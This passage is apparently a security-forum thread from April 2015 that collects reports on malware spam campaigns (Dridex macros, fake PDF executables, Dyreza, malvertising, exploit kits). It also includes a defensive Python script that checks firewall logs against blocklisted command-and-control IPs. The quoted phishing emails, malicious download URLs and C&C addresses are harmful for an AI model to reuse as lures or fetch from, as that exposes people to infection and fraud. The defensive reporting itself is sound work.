*** https://www.virustotal.com/en/file/480d3f4b1bbe21105806be6403b60a4fadb3a0d28b459a64bb773c7455eaaa28/analysis/1429088210/
- http://myonlinesecurity.co.uk/natalie-invoice-from-living-water-word-doc-or-excel-xls-spreadsheet-malware/
15 Apr 2015
> https://www.virustotal.com/en/file/95a43a3f9561e6c4647fdd61fb6d2411af6e4940491b6f69812a3ebb1914c67c/analysis/1429086260/
___
Fake 'info' SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-info-fake-pdf-malware/
15 Apr 2015 - "'RE: info' pretending to come from user <michael@ mwrk .co .za> with a zip attachment is another one from the current bot runs... The email looks like:
Always choose a reliable partner.
We are those who can offer the best financial proposal to you.
We can find the best solution to solve your specific problem.
Details see the attachment.
15 April 2015: New doc(43).zip : Extracts to: partner.exe
Current Virus total detections: 2/57* . This 'RE: info' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/304a866cceda2371137edcc1161cb4fcc9de9b9133f8b45c82e2972b7a46d4ee/analysis/1429093267/
... Behavioural information
TCP connections
83.219.139.124: https://www.virustotal.com/en/ip-address/83.219.139.124/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
5.141.22.43: https://www.virustotal.com/en/ip-address/5.141.22.43/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
:fear: :mad:
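The two Dynamoo write-ups quoted above (14 and 15 April) each end with a "Recommended blocklist" of the addresses the Dridex loader phones home to. Blocking them at the perimeter is one use; the other is to search existing firewall or proxy logs for hosts that already reached those addresses, since such a host has most likely run the macro's payload. The script below is an added example of that search, not code from either report. The blocklist entries are the IPs from the two reports; the log format ("time src -> dst:port verdict") and the log lines themselves are constructed for the example, with RFC 1918 and TEST-NET source addresses rather than real hosts.

```python
"""Match outbound connections against the "Recommended blocklist" addresses
from the two Dynamoo reports above, to find hosts that already called home.

Added example, not the reports' own code. The log format and lines are
constructed; only the blocklist addresses come from the reports.
"""
import ipaddress
import re
from collections import defaultdict

# Destination addresses from the two "Recommended blocklist" sections above
# (14 and 15 April 2015). Single IPs and CIDR ranges are both accepted.
BLOCKLIST = [
    "78.24.218.186", "184.25.56.188", "176.67.160.187", "87.236.215.151",
    "154.69.104.137", "107.191.46.222", "94.23.171.198", "74.119.194.18",
    "37.140.199.100", "89.28.83.228",
]

# Constructed firewall export, "time src -> dst:port verdict" (not a real log).
SAMPLE_LOG = """\
2015-04-15T09:51:03Z 10.0.0.12 -> 78.24.218.186:443 ALLOW
2015-04-15T09:51:04Z 10.0.0.12 -> 89.28.83.228:8080 ALLOW
2015-04-15T09:52:10Z 10.0.0.7 -> 192.0.2.10:443 ALLOW
2015-04-15T09:53:00Z 10.0.0.40 -> 37.140.199.100:443 DENY
2015-04-15T09:53:05Z 10.0.0.12 -> 78.24.218.186:443 ALLOW
this line is not in the expected format
"""

LINE_RE = re.compile(
    r"^(?P<time>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+) (?P<verdict>\w+)$"
)


def build_blocklist(entries):
    """Turn IP strings and CIDR strings into network objects for membership tests."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def is_blocked(address, networks):
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in networks)


def parse_line(line):
    """One record dict per well-formed line, None for anything else."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_callbacks(log_text, entries=BLOCKLIST):
    """Return ({src: sorted blocklisted destinations it reached}, skipped_line_count).

    A DENY verdict still counts: the host tried to call home, so it is likely
    infected even though the firewall stopped that particular attempt."""
    networks = build_blocklist(entries)
    hits = defaultdict(set)
    skipped = 0
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        if rec is None:
            skipped += 1
            continue
        if is_blocked(rec["dst"], networks):
            hits[rec["src"]].add(rec["dst"])
    return {src: sorted(dsts) for src, dsts in hits.items()}, skipped


if __name__ == "__main__":
    infected, bad_lines = find_callbacks(SAMPLE_LOG)
    for host, destinations in sorted(infected.items()):
        print(f"{host} contacted {', '.join(destinations)}")
    print(f"{bad_lines} unparsable line(s) skipped")
```

Counting denied attempts as hits is deliberate: the blocklist stops the C&C traffic but not the infection, so a host that was denied still needs to be isolated and cleaned. Lines that do not parse are counted rather than silently dropped, so a format change in the log export shows up as a large skipped count instead of an empty result.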
AplusWebMaster
2015-04-16, 15:04
FYI...
Fake 'Receipt' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/carmen-rodriguez-receipt-word-doc-or-excel-xls-spreadsheet-malware/
16 Apr 2015 - "'RECEIPT' pretending to come from Carmen Rodriguez <crodriguez@ hswcorp .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Thank you for your business.
Carmen Rodriguez
Administrative Assistant
16 April 2015 : 58173841.doc | Current Virus total detections: 3/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it...."
* https://www.virustotal.com/en/file/73fcfcceba730ec97d370e27bf046ace906f8b66e5d92051eb3b094de232d9df/analysis/1429173650/
___
Fake ACH SPAM - Malware
- http://blog.dynamoo.com/2015/04/malware-spam-decisive-notification.html
16 Apr 2015 - "This -fake- ACH spam leads to malware:
From: aileen.alberts@ [redacted]
Date: 16 April 2015 at 15:55
Subject: Decisive notification about your Automated Clearing House payment
The Automated Clearing House transaction transfer, recently initiated from your company"s online bank account, has been rejected by the EPA.
Rejected ACH payment
Automated Clearing House transfer Case # L669461617
Transaction Total 27504.02 US Dollars
Email [redacted]
Reason of Termination Download full details
Please visit the link provided at the top to see more information about this problem.
The link in the email goes to a download location at dropbox .com which downloads a malicious Word document Automated_Clearing_House transaction9090.doc which contains this macro... it is rather different from other offerings. From what I can tell, it downloads an encrypted file... from:
sundsvallsrk .nu/tmp/1623782.txt -or-
hpg .se/tmp/1623782.txt
And some sort of executable from Dropbox with a detection rate of 3/57*. Automated analysis tools are inconclusive at the moment... although the Payload Security report[1] does show several dropped files including two malicious scripts... Of note is that one of the scripts downloads what looks like a PNG from:
savepic .su/5540444.png
For now, I would recommend blocking traffic to
sundsvallsrk .nu
hpg .se
savepic .su "
[1] https://www.hybrid-analysis.com/sample/8ba3602154e8f98e4a5097c9ba693b1ec0288c0a103b7715a75c3c0d73e75221?environmentId=2
* https://www.virustotal.com/en/file/cc66c07dbdf570e0790d3543e374189f57b9a09951cfab2a99bb9f9c3051c0de/analysis/1429197445/
... Behavioural information
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'IRS tax refund' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/payment-confirmation-for-tax-refund-request-3098-2344342-word-doc-or-excel-xls-spreadsheet-malware/
16 Apr 2015 - "'Payment confirmation for tax refund request # 3098-2344342' pretending to come from Internal Revenue Service <office@ irs .gov> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Payment-confirmation-for-tax-refund-request.png
"... Payment method : Wire transfer..."
16 April 2015 : confimation_3098-2344342.doc - Current Virus total detections: 0/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a85cec715b796106eabc1df74ca3b41321546820db2e93013aac45c909bd5189/analysis/1429207628/
- http://www.irs.gov/taxtopics/tc152.html
"There are -three- options for receiving your federal individual income tax refund:
- The fastest way is by direct deposit (electronic funds transfer) into your checking or savings account, including an individual retirement arrangement (IRA);
- By purchase of U.S. Series I Savings Bonds; or
- By paper check sent to the address listed on your return..."
... 'Wire Transfer' is -not- an option.
___
SCAM lures Facebook Users with “Hot Video”, Drops Trojan
- https://blog.malwarebytes.org/fraud-scam/2015/04/scam-lures-facebook-users-with-hot-video-drops-trojan/
Apr 16, 2015 - "... as more and more users are creating, sharing, and viewing videos on Facebook now more than ever, we can also expect online criminals to jump in on the bandwagon and attempt to get some of the attention, too... if you see an interesting post on your feed carrying a link to a supposed video that, once visited looks similar to the screenshot below, know that you’re no longer on Facebook but on an imitation page located at http ://storage [dot]googleapis[dot]com/yvideos/video2[dot]html:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/fake-fb-yt.png
The individual or group behind this scam has abused Google’s free online file storage service to house the HTML page that has mimicked Facebook’s interface. This method has been a long-time practice of phishers who use free such services like Dropbox and Google Drive in their campaigns. Once you hit the Play button, an error message appears on top, saying that Flash Player is required to view the video. A file named youtube.scr is downloaded instead:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/fake-fb-yt-dl.png
... This file lacks the sophistication to detect virtual environments, so one can easily test it against any free, online sandbox—in this case, I used this one from Payload Security — to see how badly it behaves on a system once executed. Malwarebytes Anti-Malware (MBAM) detects* youtube.scr as Trojan.Ransom.AHK."
* https://www.virustotal.com/en/file/21815229a5648aa694e76207f659b8728f529444d4589e1c211ba18fd446f4e7/analysis/1429127928/
... Behavioural information
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Business Support Giveaway - 419 Scam
- https://blog.malwarebytes.org/fraud-scam/2015/04/business-support-giveaway-419-scam/
Apr 15 - "... we can’t get too excited, because it’s just a fresh run of a 419 scam which has been in circulation in similar forms for about a year or two:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/unfound1.jpg
... Not the most watertight of scams when your gameplan is effectively “We’re all about solving global problems and saving the world in times of disaster...” Of course, most recipients probably don’t own a bank or a gold-plated yacht and may well throw reason out the window in favour of hitting the -reply- button. As with all mails of this type, the only thing you’re going to get is some identity fraud, financial loss and the possibility of turning yourself into a money mule. It certainly isn’t worth responding to the senders, so feel free to -delete- it and advise any recipients you know to do the same thing. This is one piece of business support you can definitely do without."
:fear: :mad:
AplusWebMaster
2015-04-17, 14:46
FYI...
Fake 'Credit Card Statement' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/julie-mckenzie-credit-card-statement-word-doc-or-excel-xls-spreadsheet-malware/
17 Apr 2015 - "'Credit Card Statement' pretending to come from Julie Mckenzie <julie38@ swift-cut .co .uk> ( random numbers after Julie) with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Credit-Card-Statement.png
17 April 2015 : C Swift Credit Card.doc - Current Virus total detections: 0/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0deaedf5c44702c9ab785b172c5089c3dca3f9a164d6caa6dfaeb8fee7da3fef/analysis/1429265218/
- http://blog.dynamoo.com/2015/04/malware-spam-julie-mckenzie.html
17 Apr 2015
"... Attached is a file C Swift Credit Card.doc which comes in at least -four- different versions, all of which are malicious and all of which have a macro... These macros download a file from one of the following locations:
http ://oolagives .com/24/733.exe
http ://derekthedp .com/24/733.exe
http ://sempersleep .com/24/733.exe
This is saved as %TEMP%\grant8i.exe and has a VirusTotal detection rate of 11/54* (identified clearly as a Dridex component). Automated analysis... shows that it attempts to communicate with:
46.36.219.32 (FastVPS, Estonia)
I recommend that you -block- traffic to that IP address. Furthermore, the Malwr report shows it dropping a malicious DLL with a detection rate of 6/53**."
* https://www.virustotal.com/en/file/98a89dd299599b9b42d6dd43e6618f0b197596d7ea20d9d335812d178490605a/analysis/1429294915/
... Behavioural information
TCP connections
46.36.219.32: https://www.virustotal.com/en/ip-address/46.36.219.32/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
** https://www.virustotal.com/en/file/5393935da519add1c19e285291dd790d8d6cf04fcdd2d721f6d530f0f2132ee7/analysis/1429295949/
___
Fake 'Conference' SCAM
- http://blog.dynamoo.com/2015/04/scam-your-invited-for-five-days-summit.html
17 Apr 2015 - "This spam email forms part of a Conference Scam*:
* http://www.theatlantic.com/international/archive/2013/10/the-new-nigerian-scam-targets-professional-conferences-for-visas/280445/
From: United Nations Summit [no_replytoold@ live .com]
Reply-To: unitednation .unt@gmail .com
Date: 16 April 2015 at 17:59
Subject: Your Invited For A Five Days Summit 5th -9th May, 2015 in London (UK),
Dear Invitee, Nonprofit/NGO Colleague,
UN General Assembly invites companies and organizations to participate in this important meeting. UN convening a Four-day Global Summit of Economists, Educationists, Administrators, Manufacturers, International Finance, Corporate Finance, Researchers, Non-Governmental Organizations, Religious Leaders, Community Organizations,lawyer and law firm,individuals from the public and Private Sector from 5th-9th May, 2015 in London (UK) to assess the worst global economic down turn since the Great Depression. The aim is to identify emergency and long-term responses to mitigate the impact of the crisis, especially on vulnerable populations, and initiate a needed dialogue on the transformation of the international financial architecture, taking into account the needs and concerns of all countries of the world. You are invited to take part in the International Conference.
Registration to this Summit is absolutely "free" and strictly for invited individuals and organizations only. As an invitee, you have received a registration code UN/CODE/66987/2015-UK with the invitation letter, which grants you access to the registration form.
The United Nations General Assembly will sponsor free travel costs and all-round flight tickets for all participant. Invited participants will only be responsible for their hotel accommodation and feeding cost at the Royal Queens Hotel...
... Notice that "Invited participants will only be responsible for their hotel accommodation and feeding cost at the Royal Queens Hotel." There is -no- hotel in London with the name "Royal Queens Hotel", but the scammers will magic one up for you to take pre-payment for your hotel.. and will then -vanish- with your money. There are some similarly-named hotels in London, for example the Hotel Royal @ Queens, but this is not the same hotel. Be warned though that sometimes scammers do go to the effort of setting up a -fake- hotel website to make the scam more credible.
Avoid."
___
Flash EK strikes again via Google’s DoubleClick
- https://blog.malwarebytes.org/malvertising-2/2015/04/flash-ek-strikes-again-via-googles-doubleclick/
Apr 16, 2015 - "A few days ago, we blogged about a -malvertising- attack on the HuffingtonPost website* via a major ad network which took advantage of a vulnerability in Flash Player... another major attack was also being carried on around the same time, most likely by the same gang. Working with ClarityAd, we quickly confirmed the malicious activity around 04/11 which showed a well-known ad network (merchenta) with direct ties to Google’s DoubleClick being caught in a large malvertising incident. The latest malvertising attack was carried through merchenta, a company that provides a platform for ad exchange and direct integrations with top publishers. They boast 28 -billion- monthly impressions for the US alone and work directly with top tier ad networks such as Google’s DoubleClick. The criminals posed as an advertiser, infiltrated the platform via a third party and managed to house a malicious advert directly on merchenta’s ad platform which was fed into Google’s DoubleClick channels. Within minutes, the booby trapped ad had a 95% reach in USA, Europe & UK exposing a huge number of people worldwide:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/merchenta.png
Although DoubleClick is 'not directly responsible' for loading the malicious ad, it starts the chain of trust with the publisher, which unfortunately has little control over the subsequent transactions taking place:
> https://blog.malwarebytes.org/wp-content/uploads/2015/04/newflow.png
... this malicious SWF had -zero- detection on VirusTotal** when it was first submitted... All ad networks have been informed, but the attack did last for a few days most likely infecting a significant number of people. This latest example is yet another reminder of one of the big weaknesses with online advertising. Ad networks rely on third parties and the chain of trust can easily be broken when -one- rogue actor joins in... These crooks essentially pose as working for a fortune 500 company and submit a clean advert. The ad network is very interested because that will be a big customer and so they make sure to accommodate the client as much as they can. The advert still goes through quality assurance and security tests before finally getting ready for prime time. Right before that happens, the rogue advertiser sends a -new- version of the ad (with only a minor change they claim) and the ad network, not wanting to lose a client, skips the checks that were already done. It turns out that the new version of the ad is -malicious- and yet has -full- clearance to be displayed via major networks. This is just one of the many tricks rogue advertisers will use to insert themselves in the chain..."
* https://blog.malwarebytes.org/malvertising-2/2015/04/booby-trapped-hugo-boss-advert-spreads-cryptowall-ransomware/
Apr 13, 2015
** https://www.virustotal.com/en/file/5d15baa9963a4b348a5fa1c103630a31961b4c80fc325b12ca88e2ee19e3064b/analysis/1429069586/
File name: merchenta-flash-malware.swf
Detection ratio: 0/57
:fear::fear: :mad:
AplusWebMaster
2015-04-20, 14:32
FYI...
Fake 'Pending payment' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/hector-malvido-pending-payment-word-doc-or-excel-xls-spreadsheet-malware/
20 Apr 2015 - "'Pending payment' pretending to come from Hector Malvido <handyman1181@ hotmail .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Pending-payment.png
20 April 2015 : filename-1.doc - Current Virus total detections: 2/57* | 3/50**
... So far I have seen 2 versions of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/686e9a383b55bc3b172b448fb0a4ba17cd516bf536927b448e2e930be21c7802/analysis/1429523984/
** https://www.virustotal.com/en/file/ee7eb51b3ffba80546330499dd67928b4d312c1dbb5fb29866e24a062d9378f9/analysis/1429523284/
- http://blog.dynamoo.com/2015/04/malware-spam-hector-malvido.html
20 Apr 2015
"... filename-1.doc (3/57* detection by AV vendors)...
... %TEMP%\grant8i.exe - VirusTotal detection rate of 5/57**
... Dridex DLL with a 3/57*** detection rate...
Recommended blocklist:
89.28.83.228
MD5s:
673626be5ea81360f526a378355e3431
7ca6884ad8900797c7f0efaaabe0c0da
8c0661aefa9aa25d8fddf2a95297e04e "
* https://www.virustotal.com/en/file/b27453540d85d2f2d75c3b9d4202cae18f00dfaab490873ce798ecbf56a58656/analysis/1429525562/
** https://www.virustotal.com/en/file/fc2224653e128c56d62f75b1a95dc80469217c090dff797f6a1f02b98a1df76d/analysis/1429525576/
*** https://www.virustotal.com/en/file/542264fe87240700795e48f2c5a509e015b382bb1505f83a1e049ef2eb72f7e6/analysis/1429526728/
___
Fake 'HSBC credit card' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-credit-card-balance-new-credit-terms-fake-pdf-malware/
20 Apr 2015 - "'HSBC credit card balance – new credit terms' coming from random names and random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Dear client,
We are pleased to inform you that our bank is ready to offer you a bank
loan. We would like to ask you to open the Attachment to this letter and
read the terms.
HSBC ...
These all have random attachment names. The name of the pretend sender matches the attachment zip name. Some I have seen are:
mark.zip
info.zip
john.shank.zip
These extract to names like monkey.exe, had.exe, blya.exe, fable.exe
20 April 2015: random zip name : Extracts to: random file name
Current Virus total detections: 3/55* | 3/55** | 3/55*** . This 'HSBC credit card balance – new credit terms' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c69fbc31eb3d17fae81798e11a8f73384fa4cfade37a45ece03623e6ec7579e6/analysis/1429531817/
** https://www.virustotal.com/en/file/7812da1dec326f26a4b6bd3c708b5eb19f89d580237f3c3a4f362779e7d3a88d/analysis/1429531906/
*** https://www.virustotal.com/en/file/7812da1dec326f26a4b6bd3c708b5eb19f89d580237f3c3a4f362779e7d3a88d/analysis/1429531906/
___
UPS Spam
- http://threattrack.tumblr.com/post/116927231653/ups-spam
Apr 20, 2015 - "Subjects Seen
Status update for tracking# 25768265
Typical e-mail details:
Dear customer,
Unfortunately we were not able to deliver the package sent to you on 29 Nov 2014 because your delivery address does not exist.
Please download and print out the following shipping invoice and collect your package at the nearest UPS office :
wwwapps .ups. com/WebTracking/track.aspx?trk=25768265&action=download_pdf_invoice
Thank you for choosing UPS
Malicious URLs
baloomedia .com/wp-content/plugins/cached_data/label_0420.zip
Malicious File Name and MD5:
label_420.pif (ed9b821c16763450cc8e807528030bc4)
Tagged: UPS, Dyreza
176.126.200.42: https://www.virustotal.com/en/ip-address/176.126.200.42/information/
___
Fiesta EK spreads Crypto-Ransomware ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/fiesta-exploit-kit-spreading-crypto-ransomware-who-is-affected/
Apr 20 2015 - "... no great surprise to see the Fiesta exploit kit being used to deliver crypto-ransomware. The choice of exploits delivered is broadly in line with other exploit kits. Flash, Internet Explorer, Adobe Reader/Acrobat, and Silverlight are all targeted:
Exploits used by Fiesta:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/fiesta-crypto9.png
... after March 19, we noticed a -change- in the malware payloads delivered to victims. Before that date, crypto-ransomware was being delivered to end users. Aside from encrypting the user’s files, this particular variant terminates some running processes (Process Explorer, Task Manager, the Command Prompt, Regedit, and Msconfig) so that it cannot be terminated by the user easily:
Screenshot of crypto-ransomware:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/fiesta-crypto2.png
After March 19, Fiesta served up a threat best known from previous years: fake antivirus. Again, it disables some common system tools such as Task Manager, Process Explorer, and Internet Explorer, so that this -fake- antivirus cannot be easily shut down. It’s not clear why the attackers chose to return to this older kind of threat:
Screenshot of fake antivirus:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/fiesta-crypto3.png
... Best practices: The first step to -defend- against these attacks is: keep software up-to-date. By removing the vulnerabilities that an exploit kit targets, users can prevent themselves from becoming the next victims of these attacks..."
:fear: :mad:
AplusWebMaster
2015-04-21, 13:53
FYI...
Fake 'E-Ticket' SPAM – javascript malware
- http://myonlinesecurity.co.uk/e-ticket-7694892-american-airlines-e-ticket-services-javascript-malware/
21 Apr 2015 - "'E-Ticket 7694892' pretending to come from E-Ticket <online@ ticket .com> with a link to a zip attachment is another one from the current bot runs... The email looks like:
This is your e-ticket receipt.
SEAT / 30A/ZONE 3
DATE / TIME 7 MAY, 2014, 09:19 AM
ARRIVING / Tulsa
ST / OK
REF / KE.7818 BAG / 4PC
TOTAL PRICE / 438.16 USD
FORM OF PAYMENT / CC
Download E-Ticket 7694892
Yours sincerely,
American Airlines E-Ticket services.
21 April 2015: E-Ticket 7694892.zip: Extracts to: E-Ticket 7694892.js
Current Virus total detections: 9/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e17e741288201524e089e201d9f1f3d5ad838228d52d795eb67f8953d3c194fb/analysis/1429584330/
___
Fake 'invoice' SPAM - malicious doc attachment
- http://blog.dynamoo.com/2015/04/malware-spam-lag-invoice-i413136.html
21 Apr 2015 - "This spam email does not come from LA Grinding but is instead a simple forgery with a malicious attachment.
From: Lichelle Ebner [mailto:Lichelle5938@ lagrinding .co .uk]
Sent: Tuesday, April 21, 2015 9:55 AM
Subject: LAG invoice I413136
Dear Accounts Payable,
Attached is a copy of invoice I413136 .The items were shipped. Please feel free to contact me if you have any questions or cannot read the attachment.
Thank you for your business.
Sincerely,
Lichelle Ebner
L. A. Grinding Company
Ph. (818) 846-9134
FAX (818)846-1786
So far I have seen just a single sample with an attachment I413136.doc which has a VirusTotal detection rate of 2/57* and which contains this malicious macro... in turn this downloads a component from:
http ://eternitymobiles .com/25/144.exe
..although there are probably different versions of the macro with different download locations, the binary itself should be the same in all cases. This is saved as %TEMP%\pierre6.exe and it has a detection rate of 5/56**. Automated analysis tools... show that it attempts to communicate with a familiar IP:
89.28.83.228 (StarNet SLR, Moldova)
According to this Malwr report it also drops a malicious Dridex DLL with a detection rate of 3/56***.
Recommended blocklist:
89.28.83.228 ..."
* https://www.virustotal.com/en/file/d3ed3b8efec2d8c5833e69e39b7a5a77ae5f75581d7c187e09d61e5eabe101c8/analysis/1429609465/
** https://www.virustotal.com/en/file/8a066fb2a728990a3bce6de644cff556a5ec9a15c78bdcce44eedcbdc603a54b/analysis/1429609471/
*** https://www.virustotal.com/en/file/bb91d0b139944e02a64ec0b63879c4b972edaa39a0a2382d4e79e212459c9c8e/analysis/1429610872/
___
Fake 'Admin Exchange' SPAM – PDF malware
- http://myonlinesecurity.co.uk/administrator-exchange-email-id3405629-fake-pdf-malware/
21 Apr 2015 - "'Administrator – Exchange Email id3405629' pretending to come from Administrator@ no-reply <Administrator@ your domain > with a zip attachment is another one from the current bot runs... The email looks like:
no-reply,
This attachment provides you with managing facilities for your mailboxes, public folders, distribution lists, contact and mail service general settings. Please save the attached file to your hard drive before deleting this message.
To open the attachment (Exchange_id3405629.zip) please use the following password: Ujh6JZ2mHN
Thank you,
Administrator
Note: the address it pretends to come from will be your own email domain and the link in the email will appear to be your own web site or domain.
21 April 2015: Exchange_id3405629.zip: Extracts to: Exchange.exe
Current Virus total detections: 1/54* NOTE: we are also seeing the same malware payload coming in as a -fake- fax, and with the subject of Internal ONLY . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/71ff5e3c9e74f6cad1d405b2172a76527396b05fa7767cf85be58da06c68fd28/analysis/1429610427/
... Behavioural information
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
- http://threattrack.tumblr.com/post/117000757743/exchange-administrator-spam
Apr 21, 2015
Tagged: Exchange, Dyreza
___
Fake 'new my info' SPAM – PDF malware
- http://myonlinesecurity.co.uk/new-my-info-fake-pdf-malware/
21 Apr 2015 - "'new my info' pretending to come from random names and email addresses with a zip attachment that is named after the alleged sender is another one from the current bot runs... The email looks like:
Hello! I have found some interesting information that you might need!
Check out the attached file!
Bicicletes Nadal Oliver, S.L.
Passeig Ferrocarril, 61
07500 Manacor (Mallorca)
Illes Balears
Tel.971-843358 ...
21 April 2015: warehouseop02.zip: Extracts to: Alla.exe
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/085c2a34d0d3d96e78777761065d49c5b6116e6cfc88feea76af4afe80dd10f6/analysis/1429618876/
___
Dridex re-directing to Malicious Dropbox hosted file via Google
- https://isc.sans.edu/diary.html?storyid=19609
2015-04-21 - "... this malware may use Google Analytics to count how many people opened the file, but I haven't confirmed that. Google -redirects- are however used to obscure the destination... Google will show a note that the user was redirected, but the file will download right away. It will not open, and the user will have to open it to enable the Macro to execute (DON'T)... Word document... example I received:
> https://isc.sans.edu/diaryimages/images/Screen%20Shot%202015-04-21%20at%208_26_43%20AM.png
... Virustotal only shows 4 "hits" out of 57* AV tools tested for this binary:
(More detail at the ISC URL above.)
* https://www.virustotal.com/en/file/efd9e8d6fe04bf8b7abcdd208c7f1b2b2fabf2ae09bce9775631047455cd533b/analysis/1429631351/
File name: ACH transaction0336.doc
:fear: :mad:
AplusWebMaster
2015-04-22, 14:08
FYI...
Fake 'voice message' SPAM – fake wav malware
- http://myonlinesecurity.co.uk/voipfone-new-voice-message-in-mailbox-fake-wav-malware/
22 Apr 2015 - "'New voice message in mailbox' pretending to come from Voipfone Voicemail <voicemail@ voipfone .co .uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/New-voice-message-in-mailbox.png
22 April 2015: WAV0004291.wav.zip: Extracts to: WAV0004291.wav.exe
Current Virus total detections: 3/52* . This 'New voice message in mailbox' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0a760819fcd40ea9e3a42a651c201c314e7a0ecfacc611341fe3a2c9192a7683/analysis/1429691927/
... Behavioural information
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/new-invoice-idsi19779d-signwave-jose-may-word-doc-or-excel-xls-spreadsheet-malware/
22 Apr 2015 - "'New Invoice ID:SI19779D' from [random company] pretending to come from [random name] using random names at random email addresses with a link to a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/signwave_email.png
Note: I received this as a bounced return to thespykiller. I can categorically state that it was never sent from thespykiller domain. The bad guys -spoof- email addresses to pretend to send from all the time. 99.9% of the time the alleged sending domain has -never- been hacked and they just pretend to send from that domain. I have since received several different versions from loads of random companies. The invoice number is also random in all cases.
22 April 2015 : SI19779D.docm - Current Virus total detections: 0/55*
So far I am only seeing 1 version of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8509550d6f695d47e6a4714a712a1879551ac6406e3c4def5bba1fe6e8ec453c/analysis/1429707780/
___
HSBC Payment Advice Spam
- http://threattrack.tumblr.com/post/117083173703/hsbc-payment-advice-spam
Apr 22, 2015 - "Subjects Seen:
Payment Advice - Advice Ref:[GB007112] / CHAPS credits
Typical e-mail details:
Sir/Madam,
Please download document from server, payment advice is issued at the request of our customer. The advice is for your reference only.
Download link:
bilbaopisos .es/HSBC_BANK-DATA/new_secure.html
Yours faithfully,
Global Payments and Cash Management
HSBC
Malicious URLs
bilbaopisos .es/HSBC_BANK-DATA/new_secure.html
Malicious File Name and MD5:
new_secure_payment.exe (c290126e419ff58678c3e490d89d7343)
Screenshot: https://41.media.tumblr.com/bcff8fce61f554069bce6443444ca025/tumblr_inline_nn7nfbR9TO1r6pupn_500.png
Tagged: HSBC, Upatre
bilbaopisos .es: 216.119.143.194: https://www.virustotal.com/en/ip-address/216.119.143.194/information/
- http://blog.mxlab.eu/2015/04/23/url-in-fake-email-from-hsbc-payment-advice-leads-to-obfuscated-malicious-javascript/
Apr 23, 2015
wadv.com .br: 54.191.242.215: https://www.virustotal.com/en/ip-address/54.191.242.215/information/
> https://www.virustotal.com/en/url/ba7f9c3bd4cf9272d3651cca891c220dbec01c4359f417eece31c9eb4a09ac0b/analysis/
___
Fake 'New document' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-new-document-with.html
22 Apr 2015 - "I have only seen one sample of this -spam- so far, it is likely that other variants use different company names:
From: Tamika Cortez
Date: 22 April 2015 at 14:33
Subject: New document with ID:G27427P from RESTAURANT GROUP PLC was generated
New report with ID:G27427P was generated by our system. Please follow the link below to get your report.
Download report ID:G27427P
Best regards ,Tamika Cortez
